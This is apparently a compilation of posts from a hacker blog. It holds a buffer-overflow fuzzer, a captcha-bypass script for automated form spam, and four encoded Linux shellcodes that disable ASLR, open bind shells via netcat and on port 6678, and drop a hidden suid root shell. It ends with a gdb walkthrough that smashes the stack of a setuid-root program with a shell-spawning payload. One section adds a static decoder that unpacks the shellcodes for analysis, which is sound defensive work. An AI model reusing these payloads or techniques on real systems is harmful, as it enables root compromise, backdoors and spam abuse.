'''define color'''
green = '\033[38m'
red = '\033[31m'
reset = '\033[0;0m'
name = sys.argv[0]
fail = "[Failure]"
ok = "[Ok]"
face = '''
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>'''
option = '''
Usage: %s [options]
Options: -a, --application <path-to-application> | Target application for bruteforcing buffer
         -s, --start <int>                       | start byte for bruteforcing buffer
         -e, --end <int>                         | end byte for bruteforcing buffer
         -h, --help <help>                       | print this help
Example: %s -a /home/gunslinger/bufferoverflow/bof -s 1 -e 500
''' % (name, name)


def myface():
    print face


def helpMe():
    myface()
    print option
    sys.exit(1)


if len(sys.argv) <= 1:
    helpMe()

# the value of an option is the argv element right after the option itself
for arg in sys.argv:
    if arg.lower() == '-a' or arg.lower() == '--application':
        app = sys.argv[int(sys.argv[1:].index(arg)) + 2]
    elif arg.lower() == '-s' or arg.lower() == '--start':
        # converted once here so that the loop below compares numbers, not strings
        counter = int(sys.argv[int(sys.argv[1:].index(arg)) + 2])
    elif arg.lower() == '-e' or arg.lower() == '--end':
        end = int(sys.argv[int(sys.argv[1:].index(arg)) + 2])
    elif arg.lower() == '-h' or arg.lower() == '--help':
        helpMe()


def checkingexistingfile():
    if os.path.exists(app):
        exfile = green + ok
    else:
        exfile = red + fail
    print "\n[*] Checking Existing application \t\t\t\t\t%s%s" % (exfile, reset)
    if exfile == red + fail:
        print "[*] Please check your application target path"
        exit()


def checkperl():
    perl = "perl -e 'print \"A\" x 1'"
    result = commands.getstatusoutput(perl)[1]
    if re.findall("A", result):
        print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (green, ok, reset)
    else:
        print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (red, fail, reset)
        print "[*] Is perl installed on your system ?"
        exit()


def bruteforcebuff():
    global counter
    print "[*] Preparing for bruteforcing buffer \t\t\t\t\t%s%s%s" % (green, ok, reset)
    while counter <= end:
        try:
            sys.stdout.write("\r[*] buffering on %s%d%s byte(s)" % (red, counter, reset))
            sys.stdout.flush()
            args = app + ' `perl -e \'print "A" x ' + repr(counter) + '\'`'
            # getstatusoutput() returns the wait status: 35584 == 139 << 8, and 139
            # (128 + 11) is the shell's exit code for a child killed by SIGSEGV
            status = commands.getstatusoutput(args)[0]
            if status == 35584:
                print "\n[!] Application got segmentation fault by giving %s%d%s byte(s) into buffer !!\n" % (red, counter, reset)
                break
            counter += 1
        except KeyboardInterrupt:
            print "\n[-] Exiting %s" % (name)
            sys.exit(1)


def main():
    myface()
    checkingexistingfile()
    checkperl()
    bruteforcebuff()


if __name__ == '__main__':
    main()
————————————————————–EOF——————————————————–
how to bypass captcha
A few years ago I heard that the captchas on websites such as gmail, yahoo and hotmail had been broken by spammers and elite hackers…
who used that to create junk usernames by the tens of thousands.
That made me very curious; I tried implementing it last week and only today am I posting it…
These big companies have since closed that hole.
I also wrote a program using mechanize in Python that behaves as if a human were surfing with a browser.
The website in question (sorry, I won't name it) requires a cookie and a session, and the captcha has to be beaten to submit the form, with a few extra modules on top.
That is the reason I used mechanize rather than urllib, urllib2 or httplib.
The only difference is that this is a program that repeats until a set end;
a human would of course be exhausted after submitting just 1000 times ;) .
So I laid out the logic like this.
Program -> Visit web -> Saving cookies -> Saving session -> Downloading captcha
                                                                 |
                                                Breaking captcha on local system
                                                                 |
    if captcha succeeds -> continue submitting data (with the cookie and session from before) -> data submitted!
    if not succeeded    -> report to main program
#!/usr/bin/python
import os.path, urllib2, urllib, StringIO, commands, re, os
from urllib2 import urlopen, Request
COOKIEFILE = 'cookies.lwp'  # "cookiejar" file for cookie saving/reloading
# first try getting the best possible solution, cookielib:
try:
    import cookielib
except ImportError:  # no cookielib, try ClientCookie instead
    cookielib = None
    try:
        import ClientCookie
    except ImportError:  # nope, no cookies today
        cj = None  # so, in particular, no cookie jar
    else:  # using ClientCookie, prepare everything
        urlopen = ClientCookie.urlopen
        cj = ClientCookie.LWPCookieJar()
        Request = ClientCookie.Request
else:  # we do have cookielib, prepare the jar
    cj = cookielib.LWPCookieJar()
# Now load the cookies, if any, and build+install an opener using them
if cj is not None:
    if os.path.isfile(COOKIEFILE):
        cj.load(COOKIEFILE)
    if cookielib:
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        urllib2.install_opener(opener)
    else:
        opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
        ClientCookie.install_opener(opener)
# for example, try a URL that sets a cookie
theurl = 'http://[CENCORED]'
theurl2 = 'http://[CENCORED]'
txdata = None  # or, for POST instead of GET, txdata=urllib.urlencode(somedict)
txheaders = {'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
try:
    req = Request(theurl, txdata, txheaders)  # create a request object
    handle = urlopen(req).read()  # and open it
    angka = re.findall("jawab ini : (.*) =", handle)
    print angka[0]
    # NOTE: the arithmetic scraped from the page is handed to the shell unescaped
    count = "printf $((%s))" % (angka[0])
    smart = StringIO.StringIO(commands.getstatusoutput(count)[1]).read()
    mathguard = re.findall("name='mathguard_code' value='(.*)' />", handle)
    params = urllib.urlencode({'Phonenumbers': '02197448206',
                               'Text': 'oppppssss',
                               'mathguard_answer': smart,
                               'mathguard_code': mathguard[0],
                               'TOMBOL': 'KIRIM'})
    req = Request(theurl2, params, txheaders)  # create a request object
    handle = urlopen(req)  # and open it
    print handle
except IOError, e:
    print 'Failed to open "%s".' % theurl
    if hasattr(e, 'code'):
        print 'Error code: %s.' % e.code
else:
    print 'Here are the headers of the page:'
    print handle.info()
    # you can also use handle.read( ) to get the page, handle.geturl( ) to get the
    # the true URL (could be different from `theurl' if there have been redirects)
if cj is None:
    print "Sorry, no cookie jar, can't show you any cookies today"
else:
    print 'Here are the cookies received so far:'
    for index, cookie in enumerate(cj):
        print index, ': ', cookie
    cj.save(COOKIEFILE)  # save the cookies again
Yes, just like a human, the cookie and session persist in that program, which allows the form data to be submitted.
So how do we bypass that captcha?
We can use optical character recognition (OCR) to read the text inside the image.
The better the OCR algorithm understands how the captcha works, the better it will recognise the text inside the captcha.
OK, from a certain website I got a captcha image like the following.

Luckily an open-source OCR has already been developed, and I use GOCR.
GOCR is an open-source OCR program that you can get here: http://jocr.sourceforge.net/
OK, here is a stand-alone demo of the captcha on a local system, using GOCR to defeat it.
gunslinger@localhost:~/python$ gocr security.png
207
gunslinger@localhost:~/python$
The captcha was broken. But this captcha is a simple one, and only a simple sample from my experiment.
Secret : http://caca.zoy.org/wiki/PWNtcha Njoy
twitteater ~ twitter eater
Twitteater is a bruteforcer, freezer and status-update tool.
It uses curl to do its work.
I prefer using curl over pycurl because the code will be smaller and faster.
https://sourceforge.net/projects/twitteater/
SHA1 checksum : ae5954549026624634b4915fe3b7c0de241dd72a

echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
/*
Title : echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Name : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Date : Mon Jul 5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
#include <string.h>   /* strlen */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x57\x80\x44\x0e\xff\x01"
"\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x5f\x30\xbf\x30\xd1\xaf\x0a\x51\x67\x6d\x2e\x72"
"\x67\x67\x2e\x2e\x61\x68\x88\xe2\x51\x67\x2c\x62"
"\x62\x62\x88\xe0\x51\xea\x06\x50\x52\x88\xe0\xcc"
"\x7f\x60\xe7\xf3\xfe\xfe\xfe\x64\x62\x67\x6e\x1f"
"\x2f\x1f\x3d\x1f\x2e\x6f\x71\x6e\x62\x2e\x72\x78"
"\x72\x2e\x6a\x64\x71\x6d\x64\x6b\x2e\x71\x60\x6d"
"\x63\x6e\x6c\x68\x79\x64\x5e\x75\x60\x5e\x72\x6f"
"\x60\x62\x64";
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* jumps into the byte array; this only works where that data is mapped executable */
    (*(void(*)()) shellcode)();
    return 0;
}
nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
/*
Title : nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
Name : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
Date : Mon Jul 5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
#include <string.h>   /* strlen */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
"\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
"\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
"\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68"
"\x66\x68\x68\x6c\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8"
"\x9d";
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* jumps into the byte array; this only works where that data is mapped executable */
    (*(void(*)()) shellcode)();
    return 0;
}
bind port to 6678 XOR encoded polymorphic linux shellcode .
/*
Title : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date : Tue Jul 6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
#include <string.h>   /* strlen */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
"\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff"
"\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b"
"\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83"
"\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a"
"\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58"
"\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58"
"\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9"
"\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a"
"\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62"
"\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb"
"\xba\x01\xc7\x8a";
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* jumps into the byte array; this only works where that data is mapped executable */
    (*(void(*)()) shellcode)();
    return 0;
}
161 bytes Drop suid shell root in /tmp/.hiddenshell linux polymorphic shellcode
/*
Title : Drop suid root shell in /tmp/.hiddenshell linux polymorphic shellcode .
Name : 161 bytes Drop suid shell root in /tmp/.hiddenshell linux polymorphic shellcode
Date : Sat Jun 17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
#include <string.h>   /* strlen */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x89\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
"\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
"\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
"\xb5\x96\x1d\x29\x34\x34\x34\x98\xa5\x55\x64\x97\x9e\xa3\x64"
"\x64\xa8\x9d\x55\x64\xa9\xa2\xa5\x64\x63\x9d\x9e\x99\x99\x9a"
"\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d\xa4\xac\xa3\x55\xa7"
"\xa4\xa4\xa9\x6f\xa7\xa4\xa4\xa9\x55\x64\xa9\xa2\xa5\x64\x63"
"\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d"
"\xa2\xa4\x99\x55\x69\x6c\x6a\x6a\x55\x64\xa9\xa2\xa5\x64\x63"
"\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1";
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* jumps into the byte array; this only works where that data is mapped executable */
    (*(void(*)()) shellcode)();
    return 0;
}
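All four samples above open with the same 24-byte decoder stub: a jmp/call pair leaves the address of the encoded body in esi, then a loop applies one byte-wise operation with an immediate (add 1 in the first sample, sub 0x35 in the second and fourth, xor 0x0a in the third) to each of the cl bytes that follow. Because the stub is its own decoder, emulating that loop recovers the plain body without executing anything. The C program below is an added example written for this page, not the author's code: it recognises the stub, emulates it, and dumps the printable runs of the decoded body the way strings(1) would, so an analyst can confirm what a sample does from its bytes alone. The two byte strings are copied from the first two samples above; the xor variant is handled by the same switch.

```c
#include <stdio.h>
#include <string.h>

/* Decoder stub shared by the four samples above (24 bytes):
 *   eb 11 | 5e | 31 c9 | b1 NN | 80 MM 0e ff II | 80 e9 01 | 75 f6 | eb 05 | e8 ea ff ff ff
 *   jmp; pop esi; xor ecx,ecx; mov cl,NN; OP byte [esi+ecx-1],II; dec cl; jnz; jmp; call
 * MM is the ModRM byte of opcode 0x80: 0x44 = add (/0), 0x6c = sub (/5), 0x74 = xor (/6).
 * The stub is its own decoder, so emulating its loop recovers the plain body. */
#define STUB_LEN 24
static const unsigned char STUB_PRE[]  = {0xeb, 0x11, 0x5e, 0x31, 0xc9, 0xb1};
static const unsigned char STUB_POST[] = {0x80, 0xe9, 0x01, 0x75, 0xf6, 0xeb, 0x05,
                                          0xe8, 0xea, 0xff, 0xff, 0xff};
enum stub_op { OP_ADD = 0, OP_SUB = 5, OP_XOR = 6 };

/* Parse the stub at sc: returns the body length and sets *op / *imm, or -1
 * if the bytes are not this stub or the body is shorter than it claims. */
int parse_stub(const unsigned char *sc, size_t len, int *op, unsigned char *imm)
{
    if (len < STUB_LEN || memcmp(sc, STUB_PRE, sizeof STUB_PRE) != 0) return -1;
    if (sc[7] != 0x80 || sc[9] != 0x0e || sc[10] != 0xff) return -1;
    if (memcmp(sc + 12, STUB_POST, sizeof STUB_POST) != 0) return -1;
    int reg = (sc[8] >> 3) & 7;                  /* /r field of 0x80 picks add/sub/xor */
    if (reg != OP_ADD && reg != OP_SUB && reg != OP_XOR) return -1;
    if (len < STUB_LEN + (size_t)sc[6]) return -1;
    *op = reg;
    *imm = sc[11];
    return sc[6];
}

/* Emulate the stub's loop: the decoded body goes to out (room for 255 bytes).
 * Returns the body length, or -1 if parse_stub rejected the input. */
int decode_body(const unsigned char *sc, size_t len, unsigned char *out)
{
    int op;
    unsigned char imm;
    int n = parse_stub(sc, len, &op, &imm);
    for (int i = 0; i < n; i++) {
        unsigned char b = sc[STUB_LEN + i];
        out[i] = op == OP_ADD ? (unsigned char)(b + imm)
               : op == OP_SUB ? (unsigned char)(b - imm)
               : (unsigned char)(b ^ imm);
    }
    return n;
}

/* 1 if needle occurs in the decoded body, i.e. what strings(1) would show
 * after unpacking but never on the encoded bytes. */
int decoded_contains(const unsigned char *sc, size_t len, const char *needle)
{
    unsigned char out[256];
    int n = decode_body(sc, len, out), nl = (int)strlen(needle);
    for (int i = 0; n >= 0 && i + nl <= n; i++)
        if (memcmp(out + i, needle, (size_t)nl) == 0) return 1;
    return 0;
}

/* Byte strings copied from the first two samples above. */
static const unsigned char SC_ECHO[] =      /* add 1, 87-byte body */
    "\xeb\x11\x5e\x31\xc9\xb1\x57\x80\x44\x0e\xff\x01"
    "\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
    "\x5f\x30\xbf\x30\xd1\xaf\x0a\x51\x67\x6d\x2e\x72"
    "\x67\x67\x2e\x2e\x61\x68\x88\xe2\x51\x67\x2c\x62"
    "\x62\x62\x88\xe0\x51\xea\x06\x50\x52\x88\xe0\xcc"
    "\x7f\x60\xe7\xf3\xfe\xfe\xfe\x64\x62\x67\x6e\x1f"
    "\x2f\x1f\x3d\x1f\x2e\x6f\x71\x6e\x62\x2e\x72\x78"
    "\x72\x2e\x6a\x64\x71\x6d\x64\x6b\x2e\x71\x60\x6d"
    "\x63\x6e\x6c\x68\x79\x64\x5e\x75\x60\x5e\x72\x6f"
    "\x60\x62\x64";
static const unsigned char SC_NC[] =        /* sub 0x35, 67-byte body */
    "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
    "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
    "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
    "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
    "\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68"
    "\x66\x68\x68\x6c\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8"
    "\x9d";

int main(void)
{
    const unsigned char *samples[] = {SC_ECHO, SC_NC};
    size_t lens[] = {sizeof SC_ECHO - 1, sizeof SC_NC - 1};
    for (int k = 0; k < 2; k++) {
        unsigned char out[256];
        int n = decode_body(samples[k], lens[k], out), start = -1;
        printf("sample %d: %d-byte body, printable runs:\n", k, n);
        for (int i = 0; i <= n; i++) {           /* strings(1)-style dump */
            int p = i < n && out[i] >= 0x20 && out[i] <= 0x7e;
            if (p && start < 0) start = i;
            if (!p && start >= 0) {
                if (i - start >= 4) printf("  %.*s\n", i - start, (const char *)out + start);
                start = -1;
            }
        }
    }
    return 0;
}
```

Run it and the dump of the first sample ends with the literal command from its title, "echo 0 > /proc/sys/kernel/randomize_va_space", while the second ends with "nc -lp 31337 -e /bin//sh"; neither string is visible in the encoded bytes, which is the whole point of the encoder and the reason a static unpacker for known stubs belongs in triage ahead of any sandbox run.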
play with ron.c
I found this source on the internet.
But the exploitation trick is old style, so it's useless.
So I took up the challenge.
play with ron.c
gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
/**
* Name: StackVuln.c
* Author: Ron Bowes
* Date: March 24, 2004
* To compile: gcc StackVuln.c -o StackVuln
* Requires: n/a
*
* Purpose: This code is vulnerable to a stack overflow if more than
* 20 characters are entered. The exploit for it was written by
* Jon Erickson in Hacking: Art of exploitation, but I wrote
* this vulnerable code independently.
*/
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char string[40];
strcpy(string, argv[1]);
printf("The message was: %s\n", string);
printf("Program completed normally!\n\n");
return 0;
}
gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger:
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!
gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking null on randomize_va_space [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!
gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x1d 29
edx 0xb7fc50d0 -1208201008
ebx 0xb7fc3ff4 -1208205324
esp 0xbffff4d0 0xbffff4d0
ebp 0x41414141 0x41414141
esi 0x8048480 134513792
edi 0x8048370 134513520
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) list
19 printf("The message was: %s\n", string);
20 printf("Program completed normally!\n\n");
21 return 0;
22 }
23
(gdb) list 1
1 /**
2 * Name: StackVuln.c
3 * Author: Ron Bowes
4 * Date: March 24, 2004
5 * To compile: gcc StackVuln.c -o StackVuln
6 * Requires: n/a
7 *
8 * Purpose: This code is vulnerable to a stack overflow if more than
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1 /**
2 * Name: StackVuln.c
3 * Author: Ron Bowes
4 * Date: March 24, 2004
5 * To compile: gcc StackVuln.c -o StackVuln
6 * Requires: n/a
7 *
8 * Purpose: This code is vulnerable to a stack overflow if more than
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
19 printf("The message was: %s\n", string);
20 printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is
Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) i r esp
esp 0xbffff488 0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
�Rh//shh/bin��RS��̀\���\���\���
Program completed normally!
Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password:
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
